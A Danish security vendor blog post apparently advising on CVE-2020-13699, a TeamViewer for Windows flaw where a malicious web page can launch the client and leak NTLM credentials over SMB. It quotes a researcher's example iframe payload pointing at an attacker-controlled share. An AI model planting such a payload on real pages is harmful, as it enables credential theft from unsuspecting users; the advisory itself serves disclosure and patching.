Højrisikosårbarhed i TeamViewer kan udnyttes til at knække brugernes adgangskode – SecPod Blog
En højrisikosårbarhed blev fundet i TeamViewer til Windows. Den er registreret som “CVE-2020-13699” med en CVSS-basescore på “8.8”, som kan udnyttes af fjernangribere til at knække brugernes adgangskode og derefter føre til yderligere udnyttelse af systemet.
TeamViewer er en softwareapplikation til fjernstyring, deling af skrivebord, onlinemøder, webkonferencer og filoverførsel mellem computere, der er udviklet af det tyske firma TeamViewer GmbH. TeamViewer er tilgængelig til Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 og BlackBerry-operativsystemer. Det er også muligt at få adgang til et system, der kører TeamViewer, med en webbrowser. En nylig stigning i brugen af fjerntilslutningssoftwareapplikationer på grund af den seneste COVID-19 Pandemic work from home culture shift.
(CVE-2020-13699) Sårbarhedsdetaljer:
- CVE-2020-13699 er en sikkerhedsbrist, der stammer fra en ikke-kvoteret søgesti eller element. Sårbarheden skyldes specifikt, at programmet ikke citerer sine brugerdefinerede URI-handlere korrekt.
- En bruger med en installeret sårbar TeamViewer-version bliver lokket til at besøge et ondsindet udformet websted for at udnytte denne sårbarhed.
- Ifølge Jeffrey Hofmann, en sikkerhedsingeniør hos Praetorian, som opdagede og afslørede sårbarheden “En angriber kunne indlejre en ondsindet iframe på et websted med en udformet URL (iframe src=’teamviewer10: -play \\attacker-IP\share\fake.tvs’), som ville starte TeamViewer Windows desktop-klienten og tvinge den til at åbne en ekstern SMB share.”
- Windows udfører NTLM-godkendelse, når SMB share åbnes. Denne anmodning kan videresendes, dvs. en angriber kan fange en godkendelse og sende den til en anden server, hvilket giver vedkommende mulighed for at udføre operationer på fjernserveren ved hjælp af den godkendte brugers privilegier.
- En vellykket udnyttelse af denne sårbarhed kan give en fjernangriber mulighed for at starte TeamViewer med vilkårlige parametre. Programmet kunne tvinges til at videresende en NTLM-godkendelsesanmodning til angriberens system, hvilket muliggjorde offline regnbuetabelangreb og brute force-krakningsforsøg.
- Disse angreb kunne føre til yderligere udnyttelse på grund af stjålne legitimationsoplysninger fra den vellykkede udnyttelse af sårbarheden.
Oplysningen tyder på, at der ikke er nogen beviser for udnyttelse af denne sårbarhed.
I henhold til CIS er risikoen for udnyttelse høj for offentlige institutioner og mellemstore virksomheder. For små virksomheder er risikoen middelstor og lav for private brugere.
Indflydelse
Udnyttelsen af sårbarhederne kan give fjernangribere mulighed for at få følsomme oplysninger om legitimationsoplysninger eller tage fuld kontrol over det berørte system. Berørte produkter
TeamViewer Windows Desktop Application før 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 og 15.8.3. Løsning
TeamViewer har offentliggjort en sikkerhedsopdatering, der adresserer CVE-2020-13699. SanerNu er der offentliggjort sikkerhedsindhold til at opdage og afhjælpe denne sårbarhed. Vi anbefaler på det kraftigste at anvende sikkerhedsopdateringen med vores offentliggjorte instruktion i supportartiklen.